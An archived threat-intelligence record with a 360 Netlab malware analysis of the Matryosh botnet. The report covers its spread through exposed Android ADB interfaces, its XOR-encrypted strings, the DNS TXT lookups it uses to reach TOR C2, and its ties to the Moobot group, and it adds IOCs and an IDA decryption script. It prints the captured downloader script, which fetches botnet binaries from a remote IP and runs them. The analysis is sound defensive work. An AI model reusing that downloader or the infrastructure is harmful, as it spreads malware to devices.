{
	"id": "02e38fbd-5f60-41b9-a7a6-02fb76715b30",
	"created_at": "2026-04-10T03:21:56.947183Z",
	"updated_at": "2026-04-10T03:22:19.498731Z",
	"deleted_at": null,
	"sha1_hash": "e08391924149db5c47a5df61469aed28567d17c5",
	"title": "New Threat: Matryosh Botnet Is Spreading",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 576527,
	"plain_text": "New Threat: Matryosh Botnet Is Spreading\r\nBy Alex.Turing\r\nPublished: 2021-02-02 · Archived: 2026-04-10 02:40:56 UTC\r\nBackground\r\nOn January 25, 2021, 360 netlab BotMon system labeled a suspicious ELF file as\r\nMirai, but the network traffic did not match Mirai's characteristics.\r\nThis anomaly caught our attention, and after analysis, we determined that it was a new botnet that reused the Mirai\r\nframework, propagated through the ADB interface , and targeted Android-like devices with the main purpose of\r\nDDoS attacks.\r\nIt redesigns the encryption algorithm and obtains TOR C2 and the TOR proxys from remote hosts via DNS TXT .\r\nThe encryption algorithm implemented in this botnet and the process of obtaining C2 are nested in layers, like\r\nRussian nesting dolls.For this reason we named it Matryosh .\r\nAs the analysis progresses, more details emerge. Based on the similarity of C2 instructions, we speculate that it is\r\nanother attempt by the Moobot group , which is very active at the moment.\r\nMatryosh has no integrated scanning, vulnerability exploitation modules, the main function is DDoS attack, it\r\nsupports tcpraw, icmpecho, udpplain attacks, the basic process is shown in the following figure.\r\nPropagation\r\nCurrently Matryosh is propagated via adb, the captured payload is shown below, the main function is to download\r\nand execute scripts from the remote host 199.19.226.25.\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 1 of 11\n\nCNXN............M\r\n..¼±§±host::features=cmd,shell_v2OPENX...........iQ..°¯º±shell:cd /data/local/tmp/; rm -rf wget bwget curl bcur\r\nThe downloaded scripts are shown below, and the main function is to download and execute Matryosh samples of\r\nmultipleCPU architectures from the remote host.\r\n#!/bin/sh\r\nn=\"i586 mips mipsel armv5l armv7l\"\r\nhttp_server=\"199.19.226.25\"\r\nfor a in $n\r\ndo\r\n curl http://$http_server/nXejnFjen/$a \u003e asFxgte\r\n chmod 777 asFxgte\r\n ./asFxgte android\r\ndone\r\nfor a in $n\r\ndo\r\n rm $a\r\ndone\r\nSample Analysis\r\nMatryosh supports x86, arm, mips and other cpu architectures. x86 samples are selected for analysis in this paper,\r\nand the sample information is as follows.\r\nMD5:c96e333af964649bbc0060f436c64758\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLib:uclibc\r\nPacker:None\r\nThe function of Matryosh is relatively simple, when it runs on infected device, it renames the process and prints\r\nout the stdin: pipe failed to confuse the user. Then decrypts the remote hostname and uses the DNS TXT\r\nrequest to obtain TOR C2 and TOR proxy.After that establishes connection with the TOR proxy. And finally\r\ncommunicates with TOR C2 through the proxy and waits for the execution of the commands sent by C2.\r\nDecrypting sensitive resources\r\nAs you can see from the IDA, Matryosh stores sensitive resources encrypted to prevent the relevant functions\r\nfrom being spotted by security researchers.\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 2 of 11\n\nThe ciphertext is composed of 1 header and N body, and the structure is shown below.\r\nstruct header {\r\n u8 msg_len;\r\n u8 key;\r\n u8 body_cnt;\r\n }\r\n struct body {\r\n u8 key;\r\n u8 body_len;\r\n char *body_buf;\r\n }\r\nTake the ciphertext 06 29 02 DC 10 81 96 85 87 94 82 F5 D0 86 D5 D0 91 F8 FF F5 F5 FB 06 D2 11 04 00 00\r\n00 as an example, the decryption process is shown as follows.\r\nheader.msglen=0x06 ---\u003evalid length of the ciphertext is 6 bytes\r\nheader.key=0x29\r\nheader.body_cnt=0x2 ---\u003e 2 body\r\nbody1.key=0xdc\r\nbody1.len=0x10 ---\u003elength of body1 is 0x10 bytes\r\nbody1 decryption\r\nheader.key XOR body1.key = key of body1 to decrypt,0xf5\r\nciphertext： 81 96 85 87 94 82 F5 D0 86 D5 D0 91 F8 FF F5 F5\r\nplaintext：74 63 70 72 61 77 00 25 73 20 25 64 0d 0a 00 00 |tcpraw.%s %d....|\r\nbody2.key=0xfb\r\nbody2.len=0x6 ---\u003elength of body2 is 0x6 bytes\r\nbody2 decryption\r\nheader.key xor body2.key = key of body2 to decrypt,0x2f\r\nciphertext：D2 11 04 00 00 00\r\nplaintext： 00 c3 d6 d2 d2 d2 |.ÃÖÒÒÒ|\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 3 of 11\n\nThe effective ciphertext length is 6 bytes, so just take the first 6 bytes of body1 to get the plaintext tcpraw.\r\nThe decryption script in the Appendix can be used to decrypt the following list of resources, which can be seen in\r\nthe attack methods, remote host and other information.\r\ntcpraw icmpecho udpplain\r\n/proc/ /cmdline stdin: pipe failed\r\nhosts.hiddenservice.xyz .hiddenservice.xyz onion.hiddenservice.xyz\r\nProcess renaming\r\nRename the process to a 14 bytes case-sensitive process name to confuse the user.\r\nThe actual effect is shown in the following figure.\r\nObtaining TOR proxy and TOR C2\r\nThe process of obtaining proxy and C2 by Bot can be divided into 4 steps.\r\nstep 1\r\nDecrypt to get remote host A ( hosts.hiddenservice.xyz ) and get its DNS TXT resolution result.\r\n hosts.hiddenservice.xyz. 1751 IN TXT \"iekfgakxorbfjcefbiyj\"\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 4 of 11\n\nstep 2\r\nDecrypt to get the remote host suffix ( .hiddenservice.xyz ), then extract the characters from the string obtained\r\nin the first step ( iekfgakxorbfjcefbiyj ) according to the combination rules in the table below, and take the first\r\nrow (14,9) in the table below as an example, extract the characters with index 14 and 9 in the string, and merge to\r\nget a remote hostprefix er .\r\nIndex Value\r\n14,9 er\r\n19,10 jb\r\n3,4 fg\r\n6,2 kk\r\n8,13 oc\r\n12,18 jy\r\n11,1 fe\r\n7,15 xf\r\n5,17 ai\r\n16,0 bi\r\nFinally, the prefix and suffix of the remote hosts obtained above are stitched together\r\nto get the list of remote hosts B, as follows.\r\njb.hiddenservice.xyz er.hiddenservice.xyz\r\n-------------------- --------------------\r\nfg.hiddenservice.xyz kk.hiddenservice.xyz\r\noc.hiddenservice.xyz jy.hiddenservice.xyz\r\nfe.hiddenservice.xyz xf.hiddenservice.xyz\r\nai.hiddenservice.xyz bi.hiddenservice.xyz\r\nThe actual network traffic in the figure below, validates our analysis.\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 5 of 11\n\nIndex Value\r\nstep 3\r\nRequest DNS TXT record from the remote host B obtained in step 2 to get the address of the TOR proxy, up to 10.\r\noc.hiddenservice.xyz. 1799 IN TXT \"198.245.53.58:9095\"\r\nfe.hiddenservice.xyz. 1799 IN TXT \"198.27.82.186:9050\"\r\nstep 4\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 6 of 11\n\nDecrypt to get remote host C (onion.hiddenservice.xyz), request DNS TXT records from it, and get TOR C2\r\naddress.\r\nonion.hiddenservice.xyz. 1799 IN TXT \"4qhemgahbjg4j6pt.onion\"\r\nAt this point, all the basic information needed for C2 communication has been obtained, and Bot starts C2\r\ncommunication.\r\nC2 Communication\r\nTo communicate with C2, Bot first selects a TOR proxy at random and establishes a connection through the\r\nfollowing codesnippet.\r\nThe TOR C2, PORT information is then sent to the TOR proxy that wants to establish communication, where the\r\nport is hard-coded 31337 .\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 7 of 11\n\nIf the TOR proxy returns 05 00 00 01 00 00 00 00 00 00 , the C2 connection is successful and subsequent\r\ncommunication can begin. The actual network traffic in the following figure clearly shows the above process.\r\nAfter sending the golive packet Bot starts waiting for C2 to give the instruction. The first byte of the instruction\r\npacket specifies the type of instruction.\r\nRelationship with Moobot group\r\nThe Moobot group is a fairly active botnet group that has been innovating in encryption algorithms and network\r\ncommunication. We exposed a new branch developed by this group, LeetHozer, on April 27, 2020, and compared\r\nwith Matryosh, the similarities between the two are reflected in the following 3 aspects.\r\n1.Using a model like TOR C2\r\n2.C2 port (31337) \u0026 attack method name is the same\r\n3.C2 command format is highly similar\r\nBased on these considerations, we speculate that Matryosh isthe new work of thisparent group.\r\nConclusion\r\nMatryosh's cryptographic design has some novelty, but still falls into the Mirai single-byte XOR pattern, which is\r\nwhy it is easily flagged by antivirus software as Mirai; the changes at the network communication level indicates\r\nthat its authors wanted to implement a mechanism to protect C2 by downlinking the configuration from the cloud,\r\ndoing this will bring some difficulties to static analysis or simple IOC simulator.\r\nHowever, the act of putting all remote hosts under the same SLD is not optimal, it might change and we will keep\r\nan eye on it.All the related domains have been blocked by our DNSmon system.\r\nReaders are always welcomed to reach us on twitter or email to netlab at 360 dot cn.\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 8 of 11\n\nIOC\r\nSample MD5\r\nELF\r\n6d8a8772360034d811afd74721dbb261\r\n9e0734f658908139e99273f91871bdf6\r\nc96e333af964649bbc0060f436c64758\r\ne763fab020b7ad3e46a7d1d18cb85f66\r\nSCRIPT\r\n594f40a39e4f8f5324b3e198210ac7db\r\n1151cd05ee4d8e8c3266b888a9aea0f8\r\n93530c1b942293c0d5d6936820c6f6df\r\nb9d166b8e9972204ac0bbffda3f8eec6\r\nURL\r\nkk.hiddenservice.xyz\r\ner.hiddenservice.xyz\r\njy.hiddenservice.xyz\r\nfe.hiddenservice.xyz\r\nxf.hiddenservice.xyz\r\noc.hiddenservice.xyz\r\njb.hiddenservice.xyz\r\nai.hiddenservice.xyz\r\nbi.hiddenservice.xyz\r\nfg.hiddenservice.xyz\r\nhosts.hiddenservice.xyz\r\nonion.hiddenservice.xyz\r\nC2\r\n4qhemgahbjg4j6pt.onion：31337\r\nProxy Ip\r\n46.105.34.51:999\r\n139.99.239.154:9095\r\n139.99.134.95:9095\r\n198.27.82.186:9050\r\n188.165.233.121:9151\r\n198.245.53.58:9095\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 9 of 11\n\n51.83.186.134:9095\r\n139.99.45.195:9050\r\n51.195.91.193:9095\r\n147.135.208.13:9095\r\nDownloader\r\ni586 mips mipsel armv5l armv7l\r\nhxxp://199.19.226.25/nXejnFjen/{CPU ARCH}\r\nAppendix(IDA script)\r\nimport idc\r\nimport idaapi\r\nimport idautils\r\n# c96e333af964649bbc0060f436c64758\r\ndef find_function_arg(addr):\r\n round = 0\r\n while round \u003c 2:\r\n addr = idc.PrevHead(addr)\r\n if GetMnem(addr) == \"mov\" and \"offset\" in GetOpnd(addr, 1):\r\n return GetOperandValue(addr, 1)\r\n if GetMnem(addr) == \"push\" and \"offset\" in GetOpnd(addr, 0):\r\n return GetOperandValue(addr, 0)\r\n round += 1\r\n return 0\r\ndef get_string(addr):\r\n out = []\r\n while True:\r\n if Byte(addr) != 0:\r\n out.append(Byte(addr))\r\n else:\r\n break\r\n addr += 1\r\n return out\r\ndef descrypt(enc_lst):\r\n msg_length = enc_lst[0]\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 10 of 11\n\nxor_key1 = enc_lst[1]\r\n group = enc_lst[2]\r\n msg_lst = enc_lst[3:]\r\n des_msg = []\r\n for i in range(0, group):\r\n xor_key2 = msg_lst[0]\r\n group_len = msg_lst[1]\r\n key = xor_key1 ^ xor_key2\r\n for j in range(2, group_len + 2):\r\n des_msg.append(chr(msg_lst[j] ^ key))\r\n if len(des_msg) \u003e msg_length:\r\n des_msg = des_msg[0:msg_length]\r\n break\r\n msg_lst = msg_lst[group_len + 2:]\r\n print(\"\".join(des_msg))\r\ndescrypt_func_ea = 0x080493E0\r\nrefsto_lst = []\r\nfor ref in CodeRefsTo(descrypt_func_ea, 1):\r\n refsto_lst.append(ref)\r\nens_str_addr = []\r\nfor ea in refsto_lst:\r\n addr = find_function_arg(ea)\r\n if addr != 0:\r\n ens_str_addr.append(addr)\r\n # print(hex(addr))\r\n else:\r\n print(\"Missed arg at {}\".format(ea))\r\nfor ea in ens_str_addr:\r\n ret = get_string(ea)\r\n descrypt(ret)\r\nSource: https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/"
	],
	"report_names": [
		"matryosh-botnet-is-spreading-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775791316,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.pdf",
		"text": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.txt",
		"img": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.jpg"
	}
}